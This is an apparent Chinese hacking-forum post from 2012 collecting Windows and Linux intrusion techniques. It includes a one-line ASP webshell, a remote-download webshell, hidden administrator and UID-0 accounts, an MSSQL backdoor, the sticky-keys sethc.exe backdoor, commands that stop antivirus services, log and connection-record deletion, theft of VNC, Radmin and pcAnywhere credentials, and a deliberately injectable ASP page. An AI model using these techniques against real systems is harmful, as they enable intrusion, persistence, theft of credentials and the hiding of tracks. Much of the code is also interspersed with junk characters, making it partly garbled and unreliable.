中国网络渗透测试联盟

标题: 渗透技巧总结 [打印本页]

---

作者: admin    时间: 2012-9-5 15:00
标题: 渗透技巧总结
旁站路径问题
1、读网站配置。
, Y5 v, l9 c0 d5 b  c0 E+ V2、用以下VBS
On Error Resume Next
If (LCase(Right(WScript.Fullname,11))="wscript.exe") Then
        
" W8 t5 X: H- u
Msgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "

9 L8 a( P; F5 A# |+ O# F$ M  c$ ]Usage:Cscript vWeb.vbs",4096,"Lilo"
+ Z* w8 n, s4 b3 x. J8 c        WScript.Quit
End If
$ |. b6 C/ y+ s; l5 [Set ObjService=GetObject
" w4 a# o' ^3 i4 {7 f* l; i
/ i/ s$ T! W! E8 G* {& y; _# G" c("IIS://LocalHost/W3SVC")
# H7 f  D9 S3 F8 ~* GFor Each obj3w In objservice
, x8 c; s# q' @- J& n        If IsNumeric(obj3w.Name)

; s0 k* D/ b5 i' a+ ^1 T  f7 oThen
                Set OService=GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
# K$ |" w; a  O7 k# o         
0 R1 E/ A1 }7 H* M) q
       Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
                If Err
; _! J* Z' @( u
  X8 f' [! J& v4 H# l$ S<> 0 Then WScript.Quit (1)
1 f  w% H% f" O& w6 j+ S" x. r                WScript.Echo Chr(10) & "[" &

OService.ServerComment & "]"
3 N7 c/ E5 g& D                For Each Binds In OService.ServerBindings
     
4 [4 _! N; C$ k! h- S
                   Web = "{ " & Replace(Binds,":"," } { ") & " }"
5 w$ M+ L) z1 k! C4 d! E9 _                        
' r; A" ^* X/ {! K) N' f9 q7 g. j
3 ?4 Z( R! q( S8 uWScript.Echo Replace(Split(Replace(Web," ",""),"}{")(2),"}","")
                Next
      

         WScript.Echo "ath            : " & VDirObj.Path
  _; S* }7 s3 a& H" i) {" K( Q        End If
) ~2 ]8 R, A. Q8 h, H" K- dNext
复制代码
3、iis_spy列举（注：需要支持ASPX，反IISSPY的方法：将activeds.dll，activeds.tlb降权）
! y; x( x+ |) `* w8 s4、得到目标站目录，不能直接跨的。通过echo  ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp 或者copy 脚本文件 X:\目标目录\X.asp  像目标目录写入webshell。或者还可以试试type命令.
0 I3 m4 c/ e1 e/ |* x—————————————————————
; y/ E5 h0 `. x7 vWordPress的平台，爆绝对路径的方法是：
' ~0 L* S, `, C! _url/wp-content/plugins/akismet/akismet.php
' E/ n* l6 ]' Yurl/wp-content/plugins/akismet/hello.php
——————————————————————
3 l" T8 h+ [' t5 T# e: Z% `phpMyAdmin暴路径办法:
3 y, t% z: O0 L% T0 D! SphpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
: X' c7 ?3 W1 e2 tphpMyAdmin/index.php?lang[]=1
4 g3 _6 }) R$ x/ v, i# {, Wphpmyadmin/themes/darkblue_orange/layout.inc.php
————————————————————
网站可能目录(注：一般是虚拟主机类）
5 J+ x8 V8 I5 G, G7 P4 wdata/htdocs.网站/网站/
: U5 j8 t8 \$ ~4 G8 `/ Q# X1 W( }————————————————————
CMD下操作VPN相关
0 f2 D& u9 u0 _2 |netsh ras set user administrator permit #允许administrator拨入该VPN
5 U  I# s3 ~2 \1 E; _. d( rnetsh ras set user administrator deny #禁止administrator拨入该VPN
9 i# J- g0 L) u# onetsh ras show user #查看哪些用户可以拨入VPN
; O2 q6 ~& d$ r. L2 [2 Znetsh ras ip show config #查看VPN分配IP的方式
netsh ras ip set addrassign method = pool #使用地址池的方式分配IP
# G6 c; r. z0 |5 Q- G' v% t, s7 m5 |netsh ras ip add range from = 192.168.3.1 to = 192.168.3.254 #地址池的范围是从192.168.3.1到192.168.3.254
————————————————————
命令行下添加SQL用户的方法
需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember 'test, 'sysadmin'
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry
. d, R1 p1 Q% x2 L- L* o
. s! c* A: i$ t; K, D另类的加用户方法
9 N$ W6 u0 f" j/ g/ u  u在删掉了net.exe和不用adsi之外，新的加用户的方法。代码如下：
" c) @& u* y7 [/ v: N* a( e. E6 N) Ojs:
( a- A0 V8 h$ L, Z: Hvar o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
5 j4 e1 }! [) k0 ]6 rz.setting("AccountType")=3;
$ t+ N' R  ^; R. b; k% v7 A% I( o0 k
: s3 N, W9 y& X5 |/ f: @1 o0 avbs:
1 p- p4 G: m: B  mSet   o=CreateObject( "Shell.Users" )
) N- S$ @, _/ k' eSet z=o.create("test")
% V# S. O3 N' a, _4 k" ~; g/ Qz.changePassword "123456",""
  V  a, e( ]! c/ az.setting("AccountType")=3
——————————————————
cmd访问控制权限控制（注：反everyone不可读，工具-文件夹选项-使用简单的共享去掉即可）
8 T+ O3 i/ W8 l
2 B6 J* `3 @) P. k命令如下
cacls c: /e /t /g everyone:F           #c盘everyone权限
, o4 E0 O" [4 Y- ~# @! Qcacls "目录" /d everyone               #everyone不可读，包括admin
————————以下配合PR更好————
6 F9 g$ V, |6 Y. G3 m3 O3389相关
a、防火墙TCP/IP筛选.（关闭net stop policyagent & net stop sharedaccess）
8 E. F* O2 v8 f. @9 Q+ r/ Qb、内网环境（LCX）
2 [8 O6 |- B' i9 u- Q9 {" Rc、终端服务器超出了最大允许连接
) T$ q9 p% f- _% LXP 运行mstsc /admin
2003 运行mstsc /console   

杀软关闭（把杀软所在的文件的所有权限去掉）
处理变态诺顿企业版：
7 x. p$ x& G& R% [% {( E9 bnet stop "Symantec AntiVirus" /y
net stop "Symantec AntiVirus Definition Watcher" /y
net stop "Symantec Event Manager" /y
net stop "System Event Notification" /y
# n  [9 ?( u: V, \8 O- A' A- Qnet stop "Symantec Settings Manager" /y

卖咖啡：net stop "McAfee McShield"
+ \3 F% I/ Y; a4 C; h————————————————————
. e: v$ @& x9 A* g" W. u
- y( b" V  Q5 i) e. e: s5次SHIFT：
/ a0 M* M9 h, p0 ccopy %systemroot%\system32\sethc.exe %systemroot%\system32\dllcache\sethc1.exe
5 b( m7 G6 F8 ocopy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe /y
4 T% p# x! |) Z2 d9 K/ d: xcopy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe /y
( }% u7 l, f0 g( |——————————————————————
/ j; e  B3 L5 B隐藏账号添加：
" ^& e7 g2 U0 H8 @: d1、net user admin$ 123456 /add&net localgroup administrators admin$ /add
& V$ r5 Z- E/ f2、导出注册表SAM下用户的两个键值
" t. O5 A5 h: \0 W. D3、在用户管理界面里的admin$删除，然后把备份的注册表导回去。
* R4 |! u: r0 A4 v) h. i4、利用Hacker Defender把相关用户注册表隐藏
——————————————————————
' h4 A/ {3 e0 D  o* S7 m! Y1 CMSSQL扩展后门：
- v* E" V. @5 O3 v6 s5 Y' c* K2 bUSE master;
. L' g, ?  r6 O5 R% v3 Q1 e7 w% Q8 bEXEC sp_addextendedproc 'xp_helpsystem', 'xp_helpsystem.dll';
GRANT exec On xp_helpsystem TO public;
———————————————————————
! L' }1 g: F: S# Z0 n% }9 s日志处理
C:\WINNT\system32\LogFiles\MSFTPSVC1>下有
ex011120.log / ex011121.log / ex011124.log三个文件，
直接删除 ex0111124.log
5 Z( ^$ B6 j; Y/ Y8 }8 s不成功，“原文件...正在使用”
当然可以直接删除ex011120.log / ex011121.log
* Z- _- Y0 Y( }8 m7 C用记事本打开ex0111124.log，删除里面的一些内容后，保存，覆盖退出，成功。
, @9 _5 Z5 S% r; O* t- ]  K当停止msftpsvc服务后可直接删除ex011124.log
5 ~0 s5 w1 T2 \( t  E- I$ L
MSSQL查询分析器连接记录清除：
MSSQL 2000位于注册表如下：
HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers
0 i8 G  w* Z4 U) @5 X) v1 I找到接接过的信息删除。
MSSQL 2005是在C:\Documents and Settings\<user>\Application Data\Microsoft\Microsoft SQL
- s) _, B& r1 x, v! V# u
/ T* z' {1 w) D, g0 G( U( [Server\90\Tools\Shell\mru.dat
; l$ O6 j& I8 s0 x9 Y—————————————————————————
防BT系统拦截可使用远程下载shell，也达到了隐藏自身的效果，也可以做为超隐蔽的后门，神马的免杀webshell，用服务器安全工具一扫通通挂掉了）
+ X& o4 a' J4 i
" L, q1 K2 L+ m1 ^# \+ n( F<%
Sub eWebEditor_SaveRemoteFile(s_LocalFileName,s_RemoteFileUrl)
Dim Ads, Retrieval, GetRemoteData
On Error Resume Next
Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", s_RemoteFileUrl, False, "", ""
.Send
5 T; f$ e  ?( k- Z) A7 m% [GetRemoteData = .ResponseBody
/ ^  h: W- B% O( R  n3 P- {End With
/ @* }/ F5 F, _' n6 j5 C6 X! ]Set Retrieval = Nothing
; b9 h3 ?# J& I3 p/ Q7 \9 s9 \Set Ads = Server.CreateObject("Adodb.Stream")
With Ads
.Type = 1
1 M$ ^$ D3 I/ R) Z, q) F.Open
.Write GetRemoteData
; `. O9 j) R0 g4 V& E.SaveToFile Server.MapPath(s_LocalFileName), 2
.Cancel()
.Close()
0 s6 y# N+ G5 Z. f# L3 zEnd With
, r& W& A) [- @9 oSet Ads=nothing
9 p, N3 n+ `/ s$ y! j& FEnd Sub

+ |9 `: {* i0 ]5 Y$ v: S5 G5 SeWebEditor_SaveRemoteFile"your shell's name","your shell'urL"
! ^' ~+ M0 g  x4 c: v%>
% I* K, K% {7 C6 m9 G7 c
1 a' f9 C8 w. _* L7 ^  ], aVNC提权方法:
9 A( l# W: N$ r7 c  }0 V- @利用shell读取vnc保存在注册表中的密文，使用工具VNC4X破解
/ f9 t7 q( c( ^+ v注册表位置：HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password
6 e, x; P* |2 j0 Nregedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\SOFTWARE\ORL"
regedit -e c:\reg.dll "HKEY_LOCAL_MACHINE\Software\RealVNC\WinVNC4"
Radmin 默认端口是4899，
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置
3 \- V0 k/ {  I0 x/ g5 P然后用HASH版连接。
7 F1 D9 t0 V) {' u/ @( P如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。
5 i9 P% E. {, I1 y保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下，那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All
2 t% @" L( A6 r& a; P0 UUsers\Application Data\Symantec\pcAnywhere\文件夹下。
——————————————————————
# \0 L; Y+ B1 ?搜狗输入法的PinyinUp.exe是可读可写的直接替换即可
- _! R2 M, a; @2 S( u——————————————————----------
/ K1 a7 s; }9 F. V" S2 lWinWebMail目录下的web必须设置everyone权限可读可写，在开始程序里，找到WinWebMail快捷方式下下
来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。
没有删cmd组建的直接加用户。
' A. q+ b1 b/ j2 i) _8 M7i24的web目录也是可写，权限为administrator。
+ C  _" u9 G7 ^/ M$ Z5 ?0 W  ~
9 V0 k6 |( R9 m+ P# e% J* h1433 SA点构建注入点。
1 [1 C* B2 ~/ T4 X. h% G' b) x4 A2 e<%
- {" X. S& c, ]8 }strSQLServerName = "服务器ip"
strSQLDBUserName = "数据库帐号"
strSQLDBPassword = "数据库密码"
strSQLDBName = "数据库名称"
Set conn = Server.createObject("ADODB.Connection")
strCon = "rovider=SQLOLEDB.1ersist Security Info=False;Server=" & strSQLServerName &
- w9 E  D# L! v% k5 C6 v3 T
" ~, E; O2 d; V/ O; V* I";User ID=" & strSQLDBUserName & "assword=" & strSQLDBPassword & ";Database=" &
) c, F7 A- @. q: D$ y9 ^7 t5 e
  {4 C: V5 X  {) a: T* `( NstrSQLDBName & ";"
conn.open strCon
3 W* v8 O4 y" e# y# W1 ~dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
+ p/ V( T: n3 }; KstrSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
rs.close
; z+ R" i& y! R5 e4 [%>
复制代码
- P) W8 T( @" e8 X. b, R******liunx 相关******
一.ldap渗透技巧
1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式

2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
/ x1 A9 M, A6 ]: v/ Q找到ou,dc,dc设置

/ _" r2 S8 ~$ |! f3.查找管理员信息
9 K) W0 v5 V( B匿名方式
ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

; P6 v0 x6 c6 N7 c3 y: X' u"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
$ ?1 j+ d9 n4 ~* K( sldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b
/ `( j$ r' X+ m' \4 u  Y+ a
"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
4 `- f7 n2 i& l; F6 N
, Y3 U! l: I: R' x$ z
1 q0 m7 U' N6 q* U, A4.查找10条用户记录
- _8 ]2 S. w' d/ ^* R$ Q2 n( gldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

! E" V0 p+ w( R/ f/ ^实战:
1.cat /etc/nsswitch
看看密码登录策略我们可以看到使用了file ldap模式

3 i' V( F  e6 m7 {" x# N( c2.less /etc/ldap.conf
base ou=People,dc=unix-center,dc=net
找到ou,dc,dc设置

) k/ s7 u( N! d/ E% |, T. m- B3.查找管理员信息
3 i" k( T1 `* O6 e9 ~匿名方式
0 f- X# |4 k7 d, C8 m' u2 Dldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

2 k0 G1 E' r! @"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2
有密码形式
ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b

"cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

8 f3 _( x; h! e& S, Z
& m/ d% w; `9 {2 \0 e' e) Q9 ?1 I4.查找10条用户记录
ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

渗透实战:
1.返回所有的属性
: S5 l) N" I  J# t. a8 @, Cldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

0 g& e6 t3 @* T4 ~1 Jdn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson
1 A0 j0 I+ m6 g) [; H- K( OobjectClass: organizationalPerson
objectClass: person
objectClass: top
, B( s2 n* V! @; r. tsn: manager
cn: manager

7 q7 U. R2 W" a& n, S" Wdn: uid=superadmin,dc=ruc,dc=edu,dc=cn
uid: superadmin
+ E3 {/ ]5 ^/ LobjectClass: inetOrgPerson
. _0 d" T9 p0 u% j1 O: UobjectClass: organizationalPerson
! a2 y/ O5 K! O! h# qobjectClass: person
objectClass: top
: {' t8 w: H5 m: M% @4 r3 bsn: superadmin
, a+ Z, s# H- @% ]* r7 B: \cn: superadmin
- i, V! ]4 b: \
dn: uid=admin,dc=ruc,dc=edu,dc=cn
' w, m7 {8 f5 H# v, Z" [uid: admin
objectClass: inetOrgPerson
! l; X4 \+ v& V2 w, GobjectClass: organizationalPerson
objectClass: person
objectClass: top
sn: admin
cn: admin
9 [' b& r# i6 ]3 E7 N* H3 y
dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
! V4 p1 d% f/ T# y* g- Puid: dcp_anonymous
! d- f% G6 }9 c# M0 {objectClass: top
objectClass: person
0 [- p) R. O3 P' }% c5 t% `objectClass: organizationalPerson
objectClass: inetOrgPerson
sn: dcp_anonymous
: _4 O% a3 Y' E" qcn: dcp_anonymous
! P4 b& l8 W5 Y8 U0 @* r+ \
2 E) J% L, w. p7 m* r  `2.查看基类
' A* d5 w1 x3 N% B. e+ vbash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" |
1 `8 u% {/ ^1 S3 N
+ c- W" U8 o' s7 W. u) I0 wmore
version: 1
. j( v! w2 ^/ G& _dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

' V: B2 }, |) a0 m( I3.查找
bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
dn:
objectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn
- P, b, a5 h! }. b% c  ssupportedExtension: 2.16.840.1.113730.3.5.7
0 ^7 D2 m% p& K" {: d0 N1 X9 c3 BsupportedExtension: 2.16.840.1.113730.3.5.8
4 P+ U7 v1 D/ f8 D6 o; gsupportedExtension: 1.3.6.1.4.1.4203.1.11.1
% |2 j- a. X1 YsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25
supportedExtension: 2.16.840.1.113730.3.5.3
supportedExtension: 2.16.840.1.113730.3.5.5
: N) I2 v  v% [+ N5 {) {/ SsupportedExtension: 2.16.840.1.113730.3.5.6
% r( _$ I# s& L  |* E" gsupportedExtension: 2.16.840.1.113730.3.5.4
  {6 T+ m4 [! c: L4 }% H* HsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1
* p( O9 k! c2 k; ^supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2
3 E. ?+ V6 z8 D4 m& LsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3
& C7 r9 U2 y* [, X8 I; psupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7
, u7 B$ P4 t4 a) ?8 k$ a& t: lsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12
% l/ L9 I* p; p8 A9 k1 P- @supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14
% G; V& F# j) [( j, f2 l% }/ v4 y1 UsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15
9 u9 d) s" W; x9 Y8 U/ ksupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16
6 K) ?7 J3 s: A4 W7 tsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19
! C5 @% [" m5 |, OsupportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22
supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24
8 g7 t& E4 @4 h; N; d9 fsupportedExtension: 1.3.6.1.4.1.1466.20037
3 h2 a. O" y. k' B' [2 YsupportedExtension: 1.3.6.1.4.1.4203.1.11.3
* f* S6 o  C5 G) SsupportedControl: 2.16.840.1.113730.3.4.2
supportedControl: 2.16.840.1.113730.3.4.3
supportedControl: 2.16.840.1.113730.3.4.4
supportedControl: 2.16.840.1.113730.3.4.5
, B! f0 S+ `# [1 H* B- K# ]7 MsupportedControl: 1.2.840.113556.1.4.473
- m. O$ F, H& i3 w% `% \8 N- @supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.16
( `. e% |% R! T. }' m5 xsupportedControl: 2.16.840.1.113730.3.4.15
6 i0 y- B& o- L0 v2 U) Z0 ]" ssupportedControl: 2.16.840.1.113730.3.4.17
% B  A, c+ D$ CsupportedControl: 2.16.840.1.113730.3.4.19
supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2
- B6 H/ R8 X3 @6 A6 [supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6
& [. n5 i/ U- `: X( [4 RsupportedControl: 1.3.6.1.4.1.42.2.27.9.5.8
0 U9 O3 F2 C2 K: A' ~supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1
supportedControl: 2.16.840.1.113730.3.4.14
& t4 T% o8 i- Y% {) osupportedControl: 1.3.6.1.4.1.1466.29539.12
- o6 H/ p2 ^' E% W* W; A- ^supportedControl: 2.16.840.1.113730.3.4.12
. n1 ~9 G. v& y3 C/ g/ y9 U6 HsupportedControl: 2.16.840.1.113730.3.4.18
supportedControl: 2.16.840.1.113730.3.4.13
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
8 u1 j$ k( c  E$ O& W, D, yvendorVersion: Sun-Java(tm)-System-Directory/6.2
3 X. |6 }9 c5 ?8 g' Odataversion: 020090516011411
* U! H$ ~1 S  P8 Inetscapemdsuffix: cn=ldap://dc=webA:389
6 ]& m$ _. V# _2 F% t8 o( r- csupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
. V" r6 k7 j" v4 w  I: B8 qsupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA
- N& R, H* H( F$ K3 usupportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA
% v: a; c/ x! d/ ?$ d- w% I+ L( nsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA
9 _, Y8 ?+ m8 N  X4 a# LsupportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
2 A! P) `* ~, ?$ y" F* Q+ Z3 C% qsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA
% j" F5 c" @- r; {0 X. osupportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
  ?0 v! s% G8 |! ksupportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA
8 U1 _: `" {1 T/ lsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA
* m' E( I0 Q' z. t. xsupportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5
/ S( c! C9 M; W( T( t* i1 J( jsupportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA
supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA
6 V! ]5 H9 D9 Y: `3 ZsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA
3 R) f6 J( M3 u& j9 `6 m4 |. ~! {& CsupportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA
5 t9 i) h* @8 psupportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA
' \/ Y) Y# |. b7 e8 QsupportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA
( o" k" j4 A. F- l! Q' U3 D& dsupportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA
6 j" V0 j/ V9 ?: f& X$ ysupportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA
( S) J: i0 e- C# q* NsupportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA
* O" r; q& \) Q$ ^5 TsupportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA
+ N  u0 [6 R3 C, y( N: |6 isupportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA
2 k& H( U5 q# SsupportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5
supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5
supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA
/ B5 c" p# G6 A6 R. PsupportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA
: P! c! l$ h. q. h) gsupportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA
supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA
. R  `8 p7 B+ B1 wsupportedSSLCiphers: SSL_RSA_WITH_NULL_SHA
3 v- Q0 y8 M' X( U- \supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5
supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5
; P( F/ f- `( ?$ H( q4 {supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5
supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5
supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
————————————
2. NFS渗透技巧
5 g9 B6 ~4 K( K; x& q" I0 U) \3 cshowmount -e ip
列举IP
——————
3.rsync渗透技巧
1.查看rsync服务器上的列表
# P: f0 p* L6 Yrsync 210.51.X.X::
$ O; L0 ]2 B7 L" bfinance
img_finance
auto
img_auto
html_cms
img_cms
ent_cms
  `1 N6 s& \) t( y4 i1 c4 bent_img
ceshi
res_img
res_img_c2
6 }2 d% z% I5 Q7 B) F4 w% Echip
chip_c2
ent_icms
* F2 F8 F+ R+ ?5 O9 Agames
gamesimg
+ {0 Z! W/ m8 R+ K1 o  ^* O$ omedia
mediaimg
fashion
" T* O7 q+ D" g; D/ _# s( gres-fashion
res-fo
taobao-home
5 o" |+ A" D/ \- ]1 ares-taobao-home
house
8 M' p8 u& B' G, J+ j" {! Z/ U/ Hres-house
* q4 d' Q5 G- Q% [res-home
, O* U+ _  @) s2 q# l& L; k8 Gres-edu
/ n6 H1 z, {) {+ ]8 N3 sres-ent
, X. j/ e: t7 \1 S1 ^# lres-labs
' [8 x. J+ E2 Fres-news
res-phtv
res-media
home
edu
* p- B+ p0 |- }  H  W( snews
1 Z4 e2 P3 r4 U0 e: [res-book

0 p5 s. ~; a( w- ?( f看相应的下级目录(注意一定要在目录后面添加上/)
9 k; v2 J* H  t; I
2 r( Z; {0 o: k6 y* U# b
6 I+ l  }0 ]8 a' ~! m2 ]; Qrsync 210.51.X.X::htdocs_app/
9 ~3 @* n  x* r" Y1 srsync 210.51.X.X::auto/
( V- w2 O$ P# ~9 frsync 210.51.X.X::edu/

9 T) a7 f3 R: S8 L3 _  ^0 F2.下载rsync服务器上的配置文件
- ]# @2 s6 Q0 s, Qrsync -avz 210.51.X.X::htdocs_app/ /tmp/app/
! a9 ]' }# L: ?9 W! X7 V) Q3 M
3.向上更新rsync文件(成功上传,不会覆盖)
  g* N: a  H6 E/ D, Prsync -avz nothack.php 210.51.X.X::htdocs_app/warn/
http://app.finance.xxx.com/warn/nothack.txt
! _: ~- r' f+ a$ |
  Z; T/ @+ l& d3 |( |. @. j( A四.squid渗透技巧
nc -vv baidu.com 80
GET HTTP://www.sina.com / HTTP/1.0
GET HTTP://WWW.sina.com:22 / HTTP/1.0
) w8 W1 y# Z& `' ]/ j五.SSH端口转发
% r% o# x, n8 ^ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

2 h' x! l: ]7 D! O  B9 h: W六.joomla渗透小技巧
确定版本
  M/ A6 y0 i# w  q5 ?  J! Jindex.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-
; S/ g# L! Q7 A# a
15&catid=32:languages&Itemid=47

重新设置密码
3 c8 ?# O8 b- ^, P1 R0 y% I; ]index.php?option=com_user&view=reset&layout=confirm
4 ^6 F4 M$ P: {7 J- L. u1 t
七: Linux添加UID为0的root用户
useradd -o -u 0 nothack

3 r8 \+ ?1 _. p1 n! E1 z  {八.freebsd本地提权
[argp@julius ~]$ uname -rsi
* freebsd 7.3-RELEASE GENERIC
